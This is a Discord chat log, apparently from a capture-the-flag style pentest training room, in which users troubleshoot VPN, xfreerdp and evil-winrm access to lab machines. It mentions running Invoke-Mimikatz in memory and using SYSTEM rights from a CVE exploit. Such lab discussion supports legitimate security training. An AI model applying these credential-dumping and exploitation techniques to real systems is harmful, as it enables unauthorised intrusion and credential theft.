Edit: I waited for the network to shut down due to inactivity, then restarted it. I still can't ping that machine, but the ports are open now.

full spindle
#

hi guys can someone reset

cyan vine
#

-unmute @full spindle Don’t try to ping everyone in the discord

winter lintelBOT
#

πŸ”Š Unmuted AngelusMortis#2778

rigid umbra
#

πŸ‘‹ Hello, did everyone manage to connect to 10.200.81.150 - git-server in task 21 the first time?
At first I thought the problem was that I was making Reverse SSH connections, I used the shuttle, but when connecting via evil-winrm, the connection does NOT occur.
As with xfreerdp, an error.
What do you think I'm doing wrong?
The site itself is working.

rigid umbra
lucid zodiac
# rigid umbra

I have also encountered this problem, which needs to be solved by restarting the Windows system.

rigid umbra
#

Do you mean, after you received the shell on Windows, running
shutdown /r /t 0 command

lucid zodiac
#

yes

#

But this requires system permissions.

#

You can use the system permission obtained by that cve.

rigid umbra
#

I'll have to try.
Thank you for the information, Sugobet!

rigid umbra
#

Hmm, unfortunately, it didn't work out.
I rebooted the windows-box, but in the end the connection cannot be made.
Neither via xfreerdp, nor via evil-winrm.πŸ˜”
it feels like the problem is something else.

lone musk
#

Has anyone has serious lag issues dealing in this room when using a kali vpn with THM network?

jaunty violet
#

anyone here to answer me?

jaunty violet
#

idk why i keep getting this

strange bison
lucid leaf
#

Hi, I'm having issue using xfreerdp, it not showing the window instead showing this msg
"More documentation is coming, in the meantime consult source files"

#

@rigid umbra I'm having the same issue with xfreerdp, not running properly. Let me know if you fixed?

glacial pasture
#

For some reason, mimikatz will not run properly on the Windows machine for me; I tried over both evil-winrm and xfreerdp. Any ideas?

#

I loaded Invoke-Mimikatz.ps1 into memory on evil-winrm and then ran it once it was in memory, and it errors out when I run Invoke-Mimikatz (without the .ps1 after that finishes)

jaunty violet
#

do you think someone is on the network thats why i cant do anything? @merry robin

jaunty violet
#

is there an admin here? @old pendant

lone musk
jaunty violet
#

How do you mean?

#

Or how do you suggest i correct this?

jaunty violet
lucid leaf
#

@merry robin I'm having issue using xfreerdp as its not opening the windows and instead showing this msg
"More documentation is coming, in the meantime consult source files"
any solution?

surreal sail
# jaunty violet

have you opened port 9000 (should use >15000 πŸ˜‰ ) in the webserver firewall? or try transferring the file with scp from the kali machine

peak orbit
#

Hello, I have a problem with my VPN access, first I had the problem of the 404 page, I followed the methodology of the pinned message, but now when I download the vpn it is not under the format "USERNAME-wreat.ovpn" but a random string, I tried to connect with this one but nothing did

manic wind
#

I am unable to access the vpn, just keeps restarting the connection and is not completed. Tried checking the file it has the connection info, tried leaving the room and going back, tried regenerating the vpn and still nothing

manic wind
manic wind
#

sorry only looked at it properly from the screenshot

sharp ice
#

You need to change that in your script.

Just open the script in a text editor and change cipher to data-cipher or data-ciphers.

Which ever it tells you go change it to πŸ™‚